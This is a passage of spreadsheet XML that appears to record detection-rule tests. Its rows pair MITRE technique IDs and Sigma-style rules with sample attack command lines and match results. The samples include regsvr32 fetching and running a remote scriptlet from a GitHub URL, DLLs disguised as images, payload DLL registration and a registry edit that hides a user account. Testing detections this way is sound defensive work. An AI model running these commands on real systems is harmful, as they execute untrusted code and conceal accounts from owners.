        <v>0</v>
      </c>
      <c r="H3014" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3014" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe (a2910908-e86f-4687-aeba-76a5f996e652)</t>
        </is>
      </c>
      <c r="J3014" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3014" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3015" ht="15.75" customHeight="1" s="42">
      <c r="A3015" s="43" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B3015" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C3015" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D3015" s="43" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E3015" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe -Path C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll</t>
        </is>
      </c>
      <c r="F3015" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3015" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3015" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3015" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe (a2910908-e86f-4687-aeba-76a5f996e652)</t>
        </is>
      </c>
      <c r="J3015" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3015" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3016" ht="15.75" customHeight="1" s="42">
      <c r="A3016" s="43" t="inlineStr">
        <is>
          <t>t1574</t>
        </is>
      </c>
      <c r="B3016" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_cimprovider_dll_load</t>
        </is>
      </c>
      <c r="C3016" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe</t>
        </is>
      </c>
      <c r="D3016" s="43" t="inlineStr">
        <is>
          <t>a2910908-e86f-4687-aeba-76a5f996e652</t>
        </is>
      </c>
      <c r="E3016" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\SysWow64\Register-CimProvider.exe -Path "C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll"\r\n</t>
        </is>
      </c>
      <c r="F3016" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3016" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3016" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3016" s="43" t="inlineStr">
        <is>
          <t>DLL Execution Via Register-cimprovider.exe (a2910908-e86f-4687-aeba-76a5f996e652)</t>
        </is>
      </c>
      <c r="J3016" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3016" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3017" ht="15.75" customHeight="1" s="42">
      <c r="A3017" s="43" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B3017" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C3017" s="43" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D3017" s="43" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E3017" s="43" t="inlineStr">
        <is>
          <t>REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HiddenUser /d 00</t>
        </is>
      </c>
      <c r="F3017" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3017" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3017" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3017" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Hiding User Account Via SpecialAccounts Registry Key - CommandLine (9ec9fb1b-e059-4489-9642-f270c207923d)</t>
        </is>
      </c>
      <c r="J3017" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3017" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3018" ht="15.75" customHeight="1" s="42">
      <c r="A3018" s="43" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B3018" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C3018" s="43" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D3018" s="43" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E3018" s="43" t="inlineStr">
        <is>
          <t>reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v HiddenUser /d 0</t>
        </is>
      </c>
      <c r="F3018" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3018" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3018" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3018" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Hiding User Account Via SpecialAccounts Registry Key - CommandLine (9ec9fb1b-e059-4489-9642-f270c207923d)</t>
        </is>
      </c>
      <c r="J3018" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3018" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3019" ht="15.75" customHeight="1" s="42">
      <c r="A3019" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3019" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C3019" s="43" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D3019" s="43" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E3019" s="43" t="inlineStr">
        <is>
          <t>regsvr32.exe /i:payload.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F3019" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3019" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3019" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3019" s="43" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly (b236190c-1c61-41e9-84b3-3fe03f6d76b0); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3019" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3019" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3020" ht="15.75" customHeight="1" s="42">
      <c r="A3020" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3020" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C3020" s="43" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D3020" s="43" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E3020" s="43" t="inlineStr">
        <is>
          <t>regsvr32.exe -i:payload.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F3020" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3020" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3020" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3020" s="43" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly (b236190c-1c61-41e9-84b3-3fe03f6d76b0); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3020" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3020" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3021" ht="15.75" customHeight="1" s="42">
      <c r="A3021" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3021" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C3021" s="43" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D3021" s="43" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E3021" s="43" t="inlineStr">
        <is>
          <t>regsvr32.exe/i:payload.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F3021" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3021" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3021" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3021" s="43" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly (b236190c-1c61-41e9-84b3-3fe03f6d76b0); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3021" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3021" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3022" ht="15.75" customHeight="1" s="42">
      <c r="A3022" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3022" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_flags_anomaly</t>
        </is>
      </c>
      <c r="C3022" s="43" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly</t>
        </is>
      </c>
      <c r="D3022" s="43" t="inlineStr">
        <is>
          <t>b236190c-1c61-41e9-84b3-3fe03f6d76b0</t>
        </is>
      </c>
      <c r="E3022" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /i:payload.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F3022" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3022" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3022" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3022" s="43" t="inlineStr">
        <is>
          <t>Potential Regsvr32 Commandline Flag Anomaly (b236190c-1c61-41e9-84b3-3fe03f6d76b0); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3022" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3022" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3023" ht="15.75" customHeight="1" s="42">
      <c r="A3023" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3023" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_network_pattern</t>
        </is>
      </c>
      <c r="C3023" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern</t>
        </is>
      </c>
      <c r="D3023" s="43" t="inlineStr">
        <is>
          <t>867356ee-9352-41c9-a8f2-1be690d78216</t>
        </is>
      </c>
      <c r="E3023" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s /u -i https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F3023" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3023" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3023" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3023" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern (867356ee-9352-41c9-a8f2-1be690d78216); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3023" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3023" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3024" ht="15.75" customHeight="1" s="42">
      <c r="A3024" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3024" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_network_pattern</t>
        </is>
      </c>
      <c r="C3024" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern</t>
        </is>
      </c>
      <c r="D3024" s="43" t="inlineStr">
        <is>
          <t>867356ee-9352-41c9-a8f2-1be690d78216</t>
        </is>
      </c>
      <c r="E3024" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe  /s /u /i https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll</t>
        </is>
      </c>
      <c r="F3024" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3024" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3024" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3024" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP/FTP Pattern (867356ee-9352-41c9-a8f2-1be690d78216); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3024" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3024" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3025" ht="15.75" customHeight="1" s="42">
      <c r="A3025" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3025" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_1</t>
        </is>
      </c>
      <c r="C3025" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3025" s="43" t="inlineStr">
        <is>
          <t>9525dc73-0327-438c-8c04-13c0e037e9da</t>
        </is>
      </c>
      <c r="E3025" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe  /s "C:\Users\thaim\AppData\Local\Temp\shell32.jpg"</t>
        </is>
      </c>
      <c r="F3025" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3025" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3025" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3025" s="4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25" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3025" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3026" ht="15.75" customHeight="1" s="42">
      <c r="A3026" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3026" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_1</t>
        </is>
      </c>
      <c r="C3026" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3026" s="43" t="inlineStr">
        <is>
          <t>9525dc73-0327-438c-8c04-13c0e037e9da</t>
        </is>
      </c>
      <c r="E3026" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\\ProgramData &amp;&amp; regsvr32.exe payload.dll"</t>
        </is>
      </c>
      <c r="F3026" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3026" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3026" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3026" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3026" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3026" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3027" ht="15.75" customHeight="1" s="42">
      <c r="A3027" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3027" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_1</t>
        </is>
      </c>
      <c r="C3027" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3027" s="43" t="inlineStr">
        <is>
          <t>9525dc73-0327-438c-8c04-13c0e037e9da</t>
        </is>
      </c>
      <c r="E3027" s="43" t="inlineStr">
        <is>
          <t>regsvr32.exe "C:\\ProgramData"\payload.dll</t>
        </is>
      </c>
      <c r="F3027" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3027" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3027" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3027" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3027" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3027" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3028" ht="15.75" customHeight="1" s="42">
      <c r="A3028" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3028" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_1</t>
        </is>
      </c>
      <c r="C3028" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3028" s="43" t="inlineStr">
        <is>
          <t>9525dc73-0327-438c-8c04-13c0e037e9da</t>
        </is>
      </c>
      <c r="E3028" s="43" t="inlineStr">
        <is>
          <t>regsvr32.exe payload.dll</t>
        </is>
      </c>
      <c r="F3028" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3028" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3028" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3028" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3028" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3028" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3029" ht="15.75" customHeight="1" s="42">
      <c r="A3029" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3029" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C3029" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D3029" s="43" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E3029" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\syswow64\regsvr32.exe /s "C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll"</t>
        </is>
      </c>
      <c r="F3029" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3029" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3029" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3029" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of Regsvr32 (6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3029" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3029" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3030" ht="15.75" customHeight="1" s="42">
      <c r="A3030" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3030" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C3030" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D3030" s="43" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E3030" s="43" t="inlineStr">
        <is>
          <t>regsvr32.exe payload.dll</t>
        </is>
      </c>
      <c r="F3030" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3030" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3030" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3030" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3030" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3030" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3031" ht="15.75" customHeight="1" s="42">
      <c r="A3031" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3031" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C3031" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D3031" s="43" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E3031" s="43" t="inlineStr">
        <is>
          <t>regsvr32.exe "payload.dll"</t>
        </is>
      </c>
      <c r="F3031" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3031" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3031" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3031" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3031" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3031" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3032" ht="15.75" customHeight="1" s="42">
      <c r="A3032" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3032" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_exec_path_2</t>
        </is>
      </c>
      <c r="C3032" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 Execution From Highly Suspicious Location</t>
        </is>
      </c>
      <c r="D3032" s="43" t="inlineStr">
        <is>
          <t>327ff235-94eb-4f06-b9de-aaee571324be</t>
        </is>
      </c>
      <c r="E3032" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll</t>
        </is>
      </c>
      <c r="F3032" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3032" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3032" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3032" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of Regsvr32 (6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca); Regsvr32 Execution From Highly Suspicious Location (327ff235-94eb-4f06-b9de-aaee571324be); Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J3032" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3032" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3033" ht="15.75" customHeight="1" s="42">
      <c r="A3033" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3033" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C3033" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D3033" s="43" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E3033" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s "C:\Users\thaim\AppData\Local\Temp\shell32.jpg"</t>
        </is>
      </c>
      <c r="F3033" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3033" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3033" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3033" s="43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33" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3033" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3034" ht="15.75" customHeight="1" s="42">
      <c r="A3034" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3034" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C3034" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D3034" s="43" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E3034" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe -s C:\Users\thaim\AppData\Local\Temp\shell32.jpg</t>
        </is>
      </c>
      <c r="F3034" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3034" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3034" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3034" s="4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34" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3034" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3035" ht="15.75" customHeight="1" s="42">
      <c r="A3035" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3035" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C3035" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D3035" s="43" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E3035" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe C:\Users\thaim\AppData\Local\Temp\shell32.jpg</t>
        </is>
      </c>
      <c r="F3035" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3035" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3035" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3035" s="4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35" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3035" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3036" ht="15.75" customHeight="1" s="42">
      <c r="A3036" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3036" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C3036" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D3036" s="43" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E3036" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s C:\Users\thaim\AppData\Local\Temp\shell32.tmp</t>
        </is>
      </c>
      <c r="F3036" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3036" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3036" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3036" s="4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36" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3036" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3037" ht="15.75" customHeight="1" s="42">
      <c r="A3037" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3037" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C3037" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D3037" s="43" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E3037" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\system32\regsvr32.exe /s C:\Users\thaim\AppData\Local\Temp\shell32.JPEG</t>
        </is>
      </c>
      <c r="F3037" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3037" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3037" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3037" s="43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3037" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3037" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3038" ht="15.75" customHeight="1" s="42">
      <c r="A3038" s="43" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B3038" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C3038" s="43" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
